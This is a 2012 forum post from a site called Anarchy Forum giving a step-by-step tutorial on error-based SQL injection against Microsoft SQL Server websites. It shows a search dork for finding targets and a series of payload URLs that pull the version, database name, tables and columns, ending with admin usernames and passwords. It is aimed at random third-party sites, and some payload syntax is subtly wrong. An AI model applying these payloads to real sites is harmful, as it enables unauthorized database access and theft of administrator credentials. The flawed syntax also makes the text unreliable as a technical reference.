MsSQL Injection Tutorial

Crow_SL · 10-03-2012, 01:00 PM

Intro

Hi all on Anarchy Forum,
Today i will be showing you how to do MsSQLi. There is 2 types that i know on exploiting MsSQL database.
1. GROUPING ( its very uneffective and im not explaining it in this tut )
and
2. CONVERSION ( i will show it in this tut ).

Finding vulnerable site

For finding vulnerable site you can use google dorks
for example:

Code:
inurl:index.aspx?id=

When you find your site you can check if its vulnerable by adding ' on the end of url ( just like normal SQLi ).
So our URL will look like this:

Code:
www.site.com/index.aspx?id=5'

If you get error like this:

Code:
Microsoft OLE DB Provider for SQL Server error

[code]

Incorrect Syntax

Then its vulnerable to MsSQLi.

Finding Tables and Columns with CONVERSION

Before we continue, use notepad to write tables and columns you will need it.
So lets continue.

-Finding the version

For version our syntax will look like this:

Code:
www.site.com/index.aspx?id=5' and 1=convert(int(@@version))--

And our site output an error ( This is just example )

Code:
Microsoft OLE DB PROVIDER for sql server error... conversion failed when converting the nverchar value '5.02.00' to data type int. index.aspx on line ...

The version is 5.02.00

-Finding Database Name

Now just replace @@version with db_name()

Our URL will look like this:

Code:
www.site.com/index.aspx?id=5' and 1=convert(int(db_name()))--

The page output

Code:
database18

Our database name is database 18

-Finding database user

Now we neeed to find a user that is using that database

The URL will look like this

Code:
www.site.com/index.aspx?id=5' and 1=convert(int(user_name()))--

The page output

Code:
crow3b

So the user is crow3b ( example )

Finding Tables

So when we have done every thing from above its time to to find tables

Our URL will be

Code:
www.site.com/index.aspx?id=5' and 1=convert(int,(select top 1 table_name from information_schema.tables))--

The page output

Code:
Microsoft OLE DB PROVIDER for sql server error... conversion failed when converting the nverchar value 'tbl_members' to data type int. index.aspx on line ...

Our first table is tbl_members
But we need to find admin or user table
So lets continue

Our URL will look like this:

Code:
www.site.com/index.aspx?id=5' and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('tbl_members')))--

The page output anothere table called tbl_font

But still no admin or users table
Lets continue our search

Our URL will look like this

Code:
www.site.com/index.aspx?id=5' and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('tbl_member','tbl_font')))--

Now the site output table called tbl_admin
Finally we got our wanted table

Finding Columns

Now when you found a table you want to extract its time to find columns

Our URL will look like this

Code:
www.site.com/index.aspx?id=5' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='tbl_admin'))--

The page output column name username
So we look for more columns

Code:
www.site.com/index.aspx?id=5' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='tbl_admin' and column_name not in ('username')))--

The page now output column called password

Extracting data from Columns

Now that we have found our columns lets extract the data from them

Our URL looks like this

Code:
www.site.com/index.aspx?id=5' and 1=convert(int,(select top 1 username from tbl_admin))--

The page output username called crow3b

Now lets find password for user crow3b

Our URL will look like this

Code:
www.site.com/index.aspx?id=5' and 1=convert(int,(select top 1 password from tbl_admin))--

Now the page output password called pr0fiters

NOTE: AFTER EVERY SEARCH FOR TABLE OR COLUMN, USERNAME AND PASSWORD IF YOU GET A NORMAL PAGE IT MEANS THAT THERE IS NO MORE TABLES,COLUMNS,ETC

Thats it guys i hope this will be helpful and sorry for my bad english

-crow